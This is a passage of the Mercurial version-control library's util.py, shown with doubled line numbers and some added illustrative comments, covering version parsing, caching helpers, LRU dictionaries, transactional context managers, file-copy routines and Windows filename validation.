957 957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 958 self.name, level, optname, value, res))
959 959
960 960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 961 logdata=False, logdataapis=True):
962 962 """Turn a socket into a logging socket."""
963 963
964 964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 965 states=states, logdata=logdata,
966 966 logdataapis=logdataapis)
967 967 return socketproxy(fh, observer)
968 968
969 969 def version():
970 970 """Return version information if available."""
971 971 try:
972 972 from . import __version__
973 973 return __version__.version
974 974 except ImportError:
975 975 return 'unknown'
976 976
977 977 def versiontuple(v=None, n=4):
978 978 """Parses a Mercurial version string into an N-tuple.
979 979
980 980 The version string to be parsed is specified with the ``v`` argument.
981 981 If it isn't defined, the current Mercurial version string will be parsed.
982 982
983 983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 984 returned values:
985 985
986 986 >>> v = b'3.6.1+190-df9b73d2d444'
987 987 >>> versiontuple(v, 2)
988 988 (3, 6)
989 989 >>> versiontuple(v, 3)
990 990 (3, 6, 1)
991 991 >>> versiontuple(v, 4)
992 992 (3, 6, 1, '190-df9b73d2d444')
993 993
994 994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 995 (3, 6, 1, '190-df9b73d2d444+20151118')
996 996
997 997 >>> v = b'3.6'
998 998 >>> versiontuple(v, 2)
999 999 (3, 6)
1000 1000 >>> versiontuple(v, 3)
1001 1001 (3, 6, None)
1002 1002 >>> versiontuple(v, 4)
1003 1003 (3, 6, None, None)
1004 1004
1005 1005 >>> v = b'3.9-rc'
1006 1006 >>> versiontuple(v, 2)
1007 1007 (3, 9)
1008 1008 >>> versiontuple(v, 3)
1009 1009 (3, 9, None)
1010 1010 >>> versiontuple(v, 4)
1011 1011 (3, 9, None, 'rc')
1012 1012
1013 1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1014 >>> versiontuple(v, 2)
1015 1015 (3, 9)
1016 1016 >>> versiontuple(v, 3)
1017 1017 (3, 9, None)
1018 1018 >>> versiontuple(v, 4)
1019 1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1020
1021 1021 >>> versiontuple(b'4.6rc0')
1022 1022 (4, 6, None, 'rc0')
1023 1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1025 >>> versiontuple(b'.1.2.3')
1026 1026 (None, None, None, '.1.2.3')
1027 1027 >>> versiontuple(b'12.34..5')
1028 1028 (12, 34, None, '..5')
1029 1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 1030 (1, 2, 3, '.4.5.6')
1031 1031 """
1032 1032 if not v:
1033 1033 v = version()
1034 1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1035 if not m:
1036 1036 vparts, extra = '', v
1037 1037 elif m.group(2):
1038 1038 vparts, extra = m.groups()
1039 1039 else:
1040 1040 vparts, extra = m.group(1), None
1041 1041
1042 1042 vints = []
1043 1043 for i in vparts.split('.'):
1044 1044 try:
1045 1045 vints.append(int(i))
1046 1046 except ValueError:
1047 1047 break
1048 1048 # (3, 6) -> (3, 6, None)
1049 1049 while len(vints) < 3:
1050 1050 vints.append(None)
1051 1051
1052 1052 if n == 2:
1053 1053 return (vints[0], vints[1])
1054 1054 if n == 3:
1055 1055 return (vints[0], vints[1], vints[2])
1056 1056 if n == 4:
1057 1057 return (vints[0], vints[1], vints[2], extra)
1058 1058
1059 1059 def cachefunc(func):
1060 1060 '''cache the result of function calls'''
1061 1061 # XXX doesn't handle keyword args
1062 1062 if func.__code__.co_argcount == 0:
1063 1063 cache = []
1064 1064 def f():
1065 1065 if len(cache) == 0:
1066 1066 cache.append(func())
1067 1067 return cache[0]
1068 1068 return f
1069 1069 cache = {}
1070 1070 if func.__code__.co_argcount == 1:
1071 1071 # we gain a small amount of time because
1072 1072 # we don't need to pack/unpack the list
1073 1073 def f(arg):
1074 1074 if arg not in cache:
1075 1075 cache[arg] = func(arg)
1076 1076 return cache[arg]
1077 1077 else:
1078 1078 def f(*args):
1079 1079 if args not in cache:
1080 1080 cache[args] = func(*args)
1081 1081 return cache[args]
1082 1082
1083 1083 return f
1084 1084
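# Illustration (not part of the original file): memoizing a pure function
# with cachefunc. Positional arguments form the cache key; keyword
# arguments are not handled (see the XXX above).
#
#   >>> calls = []
#   >>> def square(x):
#   ...     calls.append(x)
#   ...     return x * x
#   >>> square = cachefunc(square)
#   >>> square(4), square(4), calls
#   (16, 16, [4])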
1085 1085 class cow(object):
1086 1086 """helper class to make copy-on-write easier
1087 1087
1088 1088 Call preparewrite before doing any writes.
1089 1089 """
1090 1090
1091 1091 def preparewrite(self):
1092 1092 """call this before writes, return self or a copied new object"""
1093 1093 if getattr(self, '_copied', 0):
1094 1094 self._copied -= 1
1095 1095 return self.__class__(self)
1096 1096 return self
1097 1097
1098 1098 def copy(self):
1099 1099 """always do a cheap copy"""
1100 1100 self._copied = getattr(self, '_copied', 0) + 1
1101 1101 return self
1102 1102
1103 1103 class sortdict(collections.OrderedDict):
1104 1104 '''a simple sorted dictionary
1105 1105
1106 1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1107 >>> d2 = d1.copy()
1108 1108 >>> d2
1109 1109 sortdict([('a', 0), ('b', 1)])
1110 1110 >>> d2.update([(b'a', 2)])
1111 1111 >>> list(d2.keys()) # should still be in last-set order
1112 1112 ['b', 'a']
1113 1113 '''
1114 1114
1115 1115 def __setitem__(self, key, value):
1116 1116 if key in self:
1117 1117 del self[key]
1118 1118 super(sortdict, self).__setitem__(key, value)
1119 1119
1120 1120 if pycompat.ispypy:
1121 1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 1122 def update(self, src):
1123 1123 if isinstance(src, dict):
1124 1124 src = src.iteritems()
1125 1125 for k, v in src:
1126 1126 self[k] = v
1127 1127
1128 1128 class cowdict(cow, dict):
1129 1129 """copy-on-write dict
1130 1130
1131 1131 Be sure to call d = d.preparewrite() before writing to d.
1132 1132
1133 1133 >>> a = cowdict()
1134 1134 >>> a is a.preparewrite()
1135 1135 True
1136 1136 >>> b = a.copy()
1137 1137 >>> b is a
1138 1138 True
1139 1139 >>> c = b.copy()
1140 1140 >>> c is a
1141 1141 True
1142 1142 >>> a = a.preparewrite()
1143 1143 >>> b is a
1144 1144 False
1145 1145 >>> a is a.preparewrite()
1146 1146 True
1147 1147 >>> c = c.preparewrite()
1148 1148 >>> b is c
1149 1149 False
1150 1150 >>> b is b.preparewrite()
1151 1151 True
1152 1152 """
1153 1153
1154 1154 class cowsortdict(cow, sortdict):
1155 1155 """copy-on-write sortdict
1156 1156
1157 1157 Be sure to call d = d.preparewrite() before writing to d.
1158 1158 """
1159 1159
1160 1160 class transactional(object):
1161 1161 """Base class for making a transactional type into a context manager."""
1162 1162 __metaclass__ = abc.ABCMeta
1163 1163
1164 1164 @abc.abstractmethod
1165 1165 def close(self):
1166 1166 """Successfully closes the transaction."""
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def release(self):
1170 1170 """Marks the end of the transaction.
1171 1171
1172 1172 If the transaction has not been closed, it will be aborted.
1173 1173 """
1174 1174
1175 1175 def __enter__(self):
1176 1176 return self
1177 1177
1178 1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1179 try:
1180 1180 if exc_type is None:
1181 1181 self.close()
1182 1182 finally:
1183 1183 self.release()
1184 1184
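# Illustration (not part of the original file): a minimal transactional
# subclass. On a clean 'with' exit, close() runs and then release(); on an
# exception only release() runs, which is where the abort happens.
#
#   >>> class demotxn(transactional):
#   ...     def close(self):
#   ...         print('committed')
#   ...     def release(self):
#   ...         print('released')
#   >>> with demotxn():
#   ...     pass
#   committed
#   released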
1185 1185 @contextlib.contextmanager
1186 1186 def acceptintervention(tr=None):
1187 1187 """A context manager that closes the transaction on InterventionRequired
1188 1188
1189 1189 If no transaction was provided, this simply runs the body and returns
1190 1190 """
1191 1191 if not tr:
1192 1192 yield
1193 1193 return
1194 1194 try:
1195 1195 yield
1196 1196 tr.close()
1197 1197 except error.InterventionRequired:
1198 1198 tr.close()
1199 1199 raise
1200 1200 finally:
1201 1201 tr.release()
1202 1202
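# Illustration (not part of the original file): acceptintervention commits
# work done so far when InterventionRequired is raised (e.g. an operation
# stopping for merge conflicts) instead of rolling the transaction back.
# `tr' is an assumed open transaction and dointerruptiblework() is
# hypothetical.
#
#   >>> with acceptintervention(tr):
#   ...     dointerruptiblework()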
1203 1203 @contextlib.contextmanager
1204 1204 def nullcontextmanager():
1205 1205 yield
1206 1206
1207 1207 class _lrucachenode(object):
1208 1208 """A node in a doubly linked list.
1209 1209
1210 1210 Holds a reference to nodes on either side as well as a key-value
1211 1211 pair for the dictionary entry.
1212 1212 """
1213 1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1214
1215 1215 def __init__(self):
1216 1216 self.next = None
1217 1217 self.prev = None
1218 1218
1219 1219 self.key = _notset
1220 1220 self.value = None
1221 1221 self.cost = 0
1222 1222
1223 1223 def markempty(self):
1224 1224 """Mark the node as emptied."""
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 class lrucachedict(object):
1230 1230 """Dict that caches most recent accesses and sets.
1231 1231
1232 1232 The dict consists of an actual backing dict - indexed by original
1233 1233 key - and a doubly linked circular list defining the order of entries in
1234 1234 the cache.
1235 1235
1236 1236 The head node is the newest entry in the cache. If the cache is full,
1237 1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 1238 the node being moved to before the existing head and being marked as the
1239 1239 new head node.
1240 1240
1241 1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 1242 simply an integer that is specified by the caller. The cache can be queried
1243 1243 for the total cost of all items presently in the cache.
1244 1244
1245 1245 The cache can also define a maximum cost. If a cache insertion would
1246 1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1247 nodes will be evicted to make room for the new node. This can be used
1248 1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1250 """
1251 1251 def __init__(self, max, maxcost=0):
1252 1252 self._cache = {}
1253 1253
1254 1254 self._head = head = _lrucachenode()
1255 1255 head.prev = head
1256 1256 head.next = head
1257 1257 self._size = 1
1258 1258 self.capacity = max
1259 1259 self.totalcost = 0
1260 1260 self.maxcost = maxcost
1261 1261
1262 1262 def __len__(self):
1263 1263 return len(self._cache)
1264 1264
1265 1265 def __contains__(self, k):
1266 1266 return k in self._cache
1267 1267
1268 1268 def __iter__(self):
1269 1269 # We don't have to iterate in cache order, but why not.
1270 1270 n = self._head
1271 1271 for i in range(len(self._cache)):
1272 1272 yield n.key
1273 1273 n = n.next
1274 1274
1275 1275 def __getitem__(self, k):
1276 1276 node = self._cache[k]
1277 1277 self._movetohead(node)
1278 1278 return node.value
1279 1279
1280 1280 def insert(self, k, v, cost=0):
1281 1281 """Insert a new item in the cache with optional cost value."""
1282 1282 node = self._cache.get(k)
1283 1283 # Replace existing value and mark as newest.
1284 1284 if node is not None:
1285 1285 self.totalcost -= node.cost
1286 1286 node.value = v
1287 1287 node.cost = cost
1288 1288 self.totalcost += cost
1289 1289 self._movetohead(node)
1290 1290
1291 1291 if self.maxcost:
1292 1292 self._enforcecostlimit()
1293 1293
1294 1294 return
1295 1295
1296 1296 if self._size < self.capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 self.totalcost -= node.cost
1305 1305 del self._cache[node.key]
1306 1306
1307 1307 node.key = k
1308 1308 node.value = v
1309 1309 node.cost = cost
1310 1310 self.totalcost += cost
1311 1311 self._cache[k] = node
1312 1312 # And mark it as newest entry. No need to adjust order since it
1313 1313 # is already self._head.prev.
1314 1314 self._head = node
1315 1315
1316 1316 if self.maxcost:
1317 1317 self._enforcecostlimit()
1318 1318
1319 1319 def __setitem__(self, k, v):
1320 1320 self.insert(k, v)
1321 1321
1322 1322 def __delitem__(self, k):
1323 1323 node = self._cache.pop(k)
1324 1324 self.totalcost -= node.cost
1325 1325 node.markempty()
1326 1326
1327 1327 # Temporarily mark as newest item before re-adjusting head to make
1328 1328 # this node the oldest item.
1329 1329 self._movetohead(node)
1330 1330 self._head = node.next
1331 1331
1332 1332 # Additional dict methods.
1333 1333
1334 1334 def get(self, k, default=None):
1335 1335 try:
1336 1336 return self.__getitem__(k)
1337 1337 except KeyError:
1338 1338 return default
1339 1339
1340 1340 def clear(self):
1341 1341 n = self._head
1342 1342 while n.key is not _notset:
1343 1343 self.totalcost -= n.cost
1344 1344 n.markempty()
1345 1345 n = n.next
1346 1346
1347 1347 self._cache.clear()
1348 1348
1349 1349 def copy(self, capacity=None, maxcost=0):
1350 1350 """Create a new cache as a copy of the current one.
1351 1351
1352 1352 By default, the new cache has the same capacity as the existing one.
1353 1353 But, the cache capacity can be changed as part of performing the
1354 1354 copy.
1355 1355
1356 1356 Items in the copy have an insertion/access order matching this
1357 1357 instance.
1358 1358 """
1359 1359
1360 1360 capacity = capacity or self.capacity
1361 1361 maxcost = maxcost or self.maxcost
1362 1362 result = lrucachedict(capacity, maxcost=maxcost)
1363 1363
1364 1364 # We copy entries by iterating in oldest-to-newest order so the copy
1365 1365 # has the correct ordering.
1366 1366
1367 1367 # Find the first non-empty entry.
1368 1368 n = self._head.prev
1369 1369 while n.key is _notset and n is not self._head:
1370 1370 n = n.prev
1371 1371
1372 1372 # We could potentially skip the first N items when decreasing capacity.
1373 1373 # But let's keep it simple unless it is a performance problem.
1374 1374 for i in range(len(self._cache)):
1375 1375 result.insert(n.key, n.value, cost=n.cost)
1376 1376 n = n.prev
1377 1377
1378 1378 return result
1379 1379
1380 1380 def popoldest(self):
1381 1381 """Remove the oldest item from the cache.
1382 1382
1383 1383 Returns the (key, value) describing the removed cache entry.
1384 1384 """
1385 1385 if not self._cache:
1386 1386 return
1387 1387
1388 1388 # Walk the linked list backwards starting at tail node until we hit
1389 1389 # a non-empty node.
1390 1390 n = self._head.prev
1391 1391 while n.key is _notset:
1392 1392 n = n.prev
1393 1393
1394 1394 key, value = n.key, n.value
1395 1395
1396 1396 # And remove it from the cache and mark it as empty.
1397 1397 del self._cache[n.key]
1398 1398 self.totalcost -= n.cost
1399 1399 n.markempty()
1400 1400
1401 1401 return key, value
1402 1402
1403 1403 def _movetohead(self, node):
1404 1404 """Mark a node as the newest, making it the new head.
1405 1405
1406 1406 When a node is accessed, it becomes the freshest entry in the LRU
1407 1407 list, which is denoted by self._head.
1408 1408
1409 1409 Visually, let's make ``N`` the new head node (* denotes head):
1410 1410
1411 1411 previous/oldest <-> head <-> next/next newest
1412 1412
1413 1413 ----<->--- A* ---<->-----
1414 1414 | |
1415 1415 E <-> D <-> N <-> C <-> B
1416 1416
1417 1417 To:
1418 1418
1419 1419 ----<->--- N* ---<->-----
1420 1420 | |
1421 1421 E <-> D <-> C <-> B <-> A
1422 1422
1423 1423 This requires the following moves:
1424 1424
1425 1425 C.next = D (node.prev.next = node.next)
1426 1426 D.prev = C (node.next.prev = node.prev)
1427 1427 E.next = N (head.prev.next = node)
1428 1428 N.prev = E (node.prev = head.prev)
1429 1429 N.next = A (node.next = head)
1430 1430 A.prev = N (head.prev = node)
1431 1431 """
1432 1432 head = self._head
1433 1433 # C.next = D
1434 1434 node.prev.next = node.next
1435 1435 # D.prev = C
1436 1436 node.next.prev = node.prev
1437 1437 # N.prev = E
1438 1438 node.prev = head.prev
1439 1439 # N.next = A
1440 1440 # It is tempting to do just "head" here, however if node is
1441 1441 # adjacent to head, this will do bad things.
1442 1442 node.next = head.prev.next
1443 1443 # E.next = N
1444 1444 node.next.prev = node
1445 1445 # A.prev = N
1446 1446 node.prev.next = node
1447 1447
1448 1448 self._head = node
1449 1449
1450 1450 def _addcapacity(self):
1451 1451 """Add a node to the circular linked list.
1452 1452
1453 1453 The new node is inserted before the head node.
1454 1454 """
1455 1455 head = self._head
1456 1456 node = _lrucachenode()
1457 1457 head.prev.next = node
1458 1458 node.prev = head.prev
1459 1459 node.next = head
1460 1460 head.prev = node
1461 1461 self._size += 1
1462 1462 return node
1463 1463
1464 1464 def _enforcecostlimit(self):
1465 1465 # This should run after an insertion. It should only be called if total
1466 1466 # cost limits are being enforced.
1467 1467 # The most recently inserted node is never evicted.
1468 1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 1469 return
1470 1470
1471 1471 # This is logically equivalent to calling popoldest() until we
1472 1472 # free up enough cost. We don't do that since popoldest() needs
1473 1473 # to walk the linked list and doing this in a loop would be
1474 1474 # quadratic. So we find the first non-empty node and then
1475 1475 # walk nodes until we free up enough capacity.
1476 1476 #
1477 1477 # If we only removed the minimum number of nodes to free enough
1478 1478 # cost at insert time, chances are high that the next insert would
1479 1479 # also require pruning. This would effectively constitute quadratic
1480 1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 1481 # target cost that is a percentage of the max cost. This will tend
1482 1482 # to free more nodes when the high water mark is reached, which
1483 1483 # lowers the chances of needing to prune on the subsequent insert.
1484 1484 targetcost = int(self.maxcost * 0.75)
1485 1485
1486 1486 n = self._head.prev
1487 1487 while n.key is _notset:
1488 1488 n = n.prev
1489 1489
1490 1490 while len(self) > 1 and self.totalcost > targetcost:
1491 1491 del self._cache[n.key]
1492 1492 self.totalcost -= n.cost
1493 1493 n.markempty()
1494 1494 n = n.prev
1495 1495
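# Illustration (not part of the original file): an lrucachedict bounded by
# both entry count and total cost. Inserting past maxcost evicts old nodes
# down to ~75% of the limit, sparing the newest entry.
#
#   >>> d = lrucachedict(4, maxcost=100)
#   >>> d.insert(b'a', b'v', cost=60)
#   >>> d.insert(b'b', b'v', cost=60)   # total 120 > 100: evicts b'a'
#   >>> b'a' in d, b'b' in d
#   (False, True)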
1496 1496 def lrucachefunc(func):
1497 1497 '''cache most recent results of function calls'''
1498 1498 cache = {}
1499 1499 order = collections.deque()
1500 1500 if func.__code__.co_argcount == 1:
1501 1501 def f(arg):
1502 1502 if arg not in cache:
1503 1503 if len(cache) > 20:
1504 1504 del cache[order.popleft()]
1505 1505 cache[arg] = func(arg)
1506 1506 else:
1507 1507 order.remove(arg)
1508 1508 order.append(arg)
1509 1509 return cache[arg]
1510 1510 else:
1511 1511 def f(*args):
1512 1512 if args not in cache:
1513 1513 if len(cache) > 20:
1514 1514 del cache[order.popleft()]
1515 1515 cache[args] = func(*args)
1516 1516 else:
1517 1517 order.remove(args)
1518 1518 order.append(args)
1519 1519 return cache[args]
1520 1520
1521 1521 return f
1522 1522
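# Illustration (not part of the original file): lrucachefunc behaves like
# cachefunc but keeps only the ~20 most recently used results, making it
# safe for functions called with many distinct arguments over a long run.
#
#   >>> cachedstat = lrucachefunc(lambda path: os.stat(path))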
1523 1523 class propertycache(object):
1524 1524 def __init__(self, func):
1525 1525 self.func = func
1526 1526 self.name = func.__name__
1527 1527 def __get__(self, obj, type=None):
1528 1528 result = self.func(obj)
1529 1529 self.cachevalue(obj, result)
1530 1530 return result
1531 1531
1532 1532 def cachevalue(self, obj, value):
1533 1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 1534 obj.__dict__[self.name] = value
1535 1535
1536 1536 def clearcachedproperty(obj, prop):
1537 1537 '''clear a cached property value, if one has been set'''
1538 1538 if prop in obj.__dict__:
1539 1539 del obj.__dict__[prop]
1540 1540
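# Illustration (not part of the original file): propertycache computes an
# attribute once and stores it in the instance __dict__, so later accesses
# bypass the descriptor; clearcachedproperty forces a recomputation.
#
#   >>> class thing(object):
#   ...     @propertycache
#   ...     def expensive(self):
#   ...         print('computing')
#   ...         return 42
#   >>> t = thing()
#   >>> t.expensive, t.expensive
#   computing
#   (42, 42)
#   >>> clearcachedproperty(t, 'expensive')   # next access recomputes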
1541 1541 def increasingchunks(source, min=1024, max=65536):
1542 1542 '''return no less than min bytes per chunk while data remains,
1543 1543 doubling min after each chunk until it reaches max'''
1544 1544 def log2(x):
1545 1545 if not x:
1546 1546 return 0
1547 1547 i = 0
1548 1548 while x:
1549 1549 x >>= 1
1550 1550 i += 1
1551 1551 return i - 1
1552 1552
1553 1553 buf = []
1554 1554 blen = 0
1555 1555 for chunk in source:
1556 1556 buf.append(chunk)
1557 1557 blen += len(chunk)
1558 1558 if blen >= min:
1559 1559 if min < max:
1560 1560 min = min << 1
1561 1561 nmin = 1 << log2(blen)
1562 1562 if nmin > min:
1563 1563 min = nmin
1564 1564 if min > max:
1565 1565 min = max
1566 1566 yield ''.join(buf)
1567 1567 blen = 0
1568 1568 buf = []
1569 1569 if buf:
1570 1570 yield ''.join(buf)
1571 1571
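# Illustration (not part of the original file): increasingchunks rebuffers
# a stream of small chunks into progressively larger ones, e.g. for
# efficient network writes.
#
#   >>> src = [b'x' * 500] * 10
#   >>> [len(c) for c in increasingchunks(src, min=1024, max=4096)]
#   [1500, 2500, 1000]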
1572 1572 def always(fn):
1573 1573 return True
1574 1574
1575 1575 def never(fn):
1576 1576 return False
1577 1577
1578 1578 def nogc(func):
1579 1579 """disable garbage collector
1580 1580
1581 1581 Python's garbage collector triggers a GC each time a certain number of
1582 1582 container objects (the number being defined by gc.get_threshold()) are
1583 1583 allocated even when marked not to be tracked by the collector. Tracking has
1584 1584 no effect on when GCs are triggered, only on what objects the GC looks
1585 1585 into. As a workaround, disable GC while building complex (huge)
1586 1586 containers.
1587 1587
1588 1588 This garbage collector issue has been fixed in 2.7, but it still affects
1589 1589 CPython's performance.
1590 1590 """
1591 1591 def wrapper(*args, **kwargs):
1592 1592 gcenabled = gc.isenabled()
1593 1593 gc.disable()
1594 1594 try:
1595 1595 return func(*args, **kwargs)
1596 1596 finally:
1597 1597 if gcenabled:
1598 1598 gc.enable()
1599 1599 return wrapper
1600 1600
1601 1601 if pycompat.ispypy:
1602 1602 # PyPy runs slower with gc disabled
1603 1603 nogc = lambda x: x
1604 1604
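# Illustration (not part of the original file): nogc as a decorator around
# code that builds huge containers, avoiding collector pauses while the
# structure is being populated.
#
#   >>> @nogc
#   ... def buildmap(pairs):
#   ...     return {k: v for k, v in pairs}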
1605 1605 def pathto(root, n1, n2):
1606 1606 '''return the relative path from one place to another.
1607 1607 root should use os.sep to separate directories
1608 1608 n1 should use os.sep to separate directories
1609 1609 n2 should use "/" to separate directories
1610 1610 returns an os.sep-separated path.
1611 1611
1612 1612 If n1 is a relative path, it's assumed it's
1613 1613 relative to root.
1614 1614 n2 should always be relative to root.
1615 1615 '''
1616 1616 if not n1:
1617 1617 return localpath(n2)
1618 1618 if os.path.isabs(n1):
1619 1619 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 1620 return os.path.join(root, localpath(n2))
1621 1621 n2 = '/'.join((pconvert(root), n2))
1622 1622 a, b = splitpath(n1), n2.split('/')
1623 1623 a.reverse()
1624 1624 b.reverse()
1625 1625 while a and b and a[-1] == b[-1]:
1626 1626 a.pop()
1627 1627 b.pop()
1628 1628 b.reverse()
1629 1629 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630 1630
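# Illustration (not part of the original file): on a POSIX platform, pathto
# walks up from n1 and back down to n2.
#
#   >>> pathto(b'/repo', b'a/b', b'c/d')
#   '../../c/d'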
1631 1631 # the location of data files matching the source code
1632 1632 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 1633 # executable version (py2exe) doesn't support __file__
1634 1634 datapath = os.path.dirname(pycompat.sysexecutable)
1635 1635 else:
1636 1636 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637 1637
1638 1638 i18n.setdatapath(datapath)
1639 1639
1640 1640 def checksignature(func):
1641 1641 '''wrap a function with code to check for calling errors'''
1642 1642 def check(*args, **kwargs):
1643 1643 try:
1644 1644 return func(*args, **kwargs)
1645 1645 except TypeError:
1646 1646 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 1647 raise error.SignatureError
1648 1648 raise
1649 1649
1650 1650 return check
1651 1651
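# Illustration (not part of the original file): checksignature converts a
# TypeError raised by a bad call signature into error.SignatureError, while
# letting TypeErrors raised inside the function propagate unchanged.
#
#   >>> f = checksignature(lambda x: x)
#   >>> f(1, 2)  # raises error.SignatureError rather than a bare TypeError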
1652 1652 # a whitelist of known filesystems where hardlinks work reliably
1653 1653 _hardlinkfswhitelist = {
1654 1654 'apfs',
1655 1655 'btrfs',
1656 1656 'ext2',
1657 1657 'ext3',
1658 1658 'ext4',
1659 1659 'hfs',
1660 1660 'jfs',
1661 1661 'NTFS',
1662 1662 'reiserfs',
1663 1663 'tmpfs',
1664 1664 'ufs',
1665 1665 'xfs',
1666 1666 'zfs',
1667 1667 }
1668 1668
1669 1669 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 1670 '''copy a file, preserving mode and optionally other stat info like
1671 1671 atime/mtime
1672 1672
1673 1673 checkambig argument is used with filestat, and is useful only if
1674 1674 destination file is guarded by any lock (e.g. repo.lock or
1675 1675 repo.wlock).
1676 1676
1677 1677 copystat and checkambig should be exclusive.
1678 1678 '''
1679 1679 assert not (copystat and checkambig)
1680 1680 oldstat = None
1681 1681 if os.path.lexists(dest):
1682 1682 if checkambig:
1683 1683 oldstat = checkambig and filestat.frompath(dest)
1684 1684 unlink(dest)
1685 1685 if hardlink:
1686 1686 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 1687 # unless we are confident that dest is on a whitelisted filesystem.
1688 1688 try:
1689 1689 fstype = getfstype(os.path.dirname(dest))
1690 1690 except OSError:
1691 1691 fstype = None
1692 1692 if fstype not in _hardlinkfswhitelist:
1693 1693 hardlink = False
1694 1694 if hardlink:
1695 1695 try:
1696 1696 oslink(src, dest)
1697 1697 return
1698 1698 except (IOError, OSError):
1699 1699 pass # fall back to normal copy
1700 1700 if os.path.islink(src):
1701 1701 os.symlink(os.readlink(src), dest)
1702 1702 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 1703 # for them anyway
1704 1704 else:
1705 1705 try:
1706 1706 shutil.copyfile(src, dest)
1707 1707 if copystat:
1708 1708 # copystat also copies mode
1709 1709 shutil.copystat(src, dest)
1710 1710 else:
1711 1711 shutil.copymode(src, dest)
1712 1712 if oldstat and oldstat.stat:
1713 1713 newstat = filestat.frompath(dest)
1714 1714 if newstat.isambig(oldstat):
1715 1715 # stat of copied file is ambiguous to original one
1716 1716 advanced = (
1717 1717 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 1718 os.utime(dest, (advanced, advanced))
1719 1719 except shutil.Error as inst:
1720 1720 raise error.Abort(str(inst))
1721 1721
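# Illustration (not part of the original file): copying a file while
# preserving mode, with hypothetical paths. hardlink=True only takes effect
# when the destination filesystem is in the whitelist above.
#
#   >>> copyfile(b'src.txt', b'dst.txt', hardlink=True)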
1722 1722 def copyfiles(src, dst, hardlink=None, progress=None):
1723 1723 """Copy a directory tree using hardlinks if possible."""
1724 1724 num = 0
1725 1725
1726 1726 def settopic():
1727 1727 if progress:
1728 1728 progress.topic = _('linking') if hardlink else _('copying')
1729 1729
1730 1730 if os.path.isdir(src):
1731 1731 if hardlink is None:
1732 1732 hardlink = (os.stat(src).st_dev ==
1733 1733 os.stat(os.path.dirname(dst)).st_dev)
1734 1734 settopic()
1735 1735 os.mkdir(dst)
1736 1736 for name, kind in listdir(src):
1737 1737 srcname = os.path.join(src, name)
1738 1738 dstname = os.path.join(dst, name)
1739 1739 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 1740 num += n
1741 1741 else:
1742 1742 if hardlink is None:
1743 1743 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 1744 os.stat(os.path.dirname(dst)).st_dev)
1745 1745 settopic()
1746 1746
1747 1747 if hardlink:
1748 1748 try:
1749 1749 oslink(src, dst)
1750 1750 except (IOError, OSError):
1751 1751 hardlink = False
1752 1752 shutil.copy(src, dst)
1753 1753 else:
1754 1754 shutil.copy(src, dst)
1755 1755 num += 1
1756 1756 if progress:
1757 1757 progress.increment()
1758 1758
1759 1759 return hardlink, num
1760 1760
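# Sketch of copyfiles() (paths illustrative): with hardlink=None it probes
# st_dev itself and reports back what it actually did:
#
#   hardlinked, copied = copyfiles(b'repo/.hg/store', b'backup/store')
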
1761 1761 _winreservednames = {
1762 1762 'con', 'prn', 'aux', 'nul',
1763 1763 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 1764 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 1765 }
1766 1766 _winreservedchars = ':*?"<>|'
1767 1767 def checkwinfilename(path):
1768 1768 r'''Check that the base-relative path is a valid filename on Windows.
1769 1769 Returns None if the path is ok, or a UI string describing the problem.
1770 1770
1771 1771 >>> checkwinfilename(b"just/a/normal/path")
1772 1772 >>> checkwinfilename(b"foo/bar/con.xml")
1773 1773 "filename contains 'con', which is reserved on Windows"
1774 1774 >>> checkwinfilename(b"foo/con.xml/bar")
1775 1775 "filename contains 'con', which is reserved on Windows"
1776 1776 >>> checkwinfilename(b"foo/bar/xml.con")
1777 1777 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 1778 "filename contains 'AUX', which is reserved on Windows"
1779 1779 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 1780 "filename contains ':', which is reserved on Windows"
1781 1781 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 1782 "filename contains '\\x07', which is invalid on Windows"
1783 1783 >>> checkwinfilename(b"foo/bar/bla ")
1784 1784 "filename ends with ' ', which is not allowed on Windows"
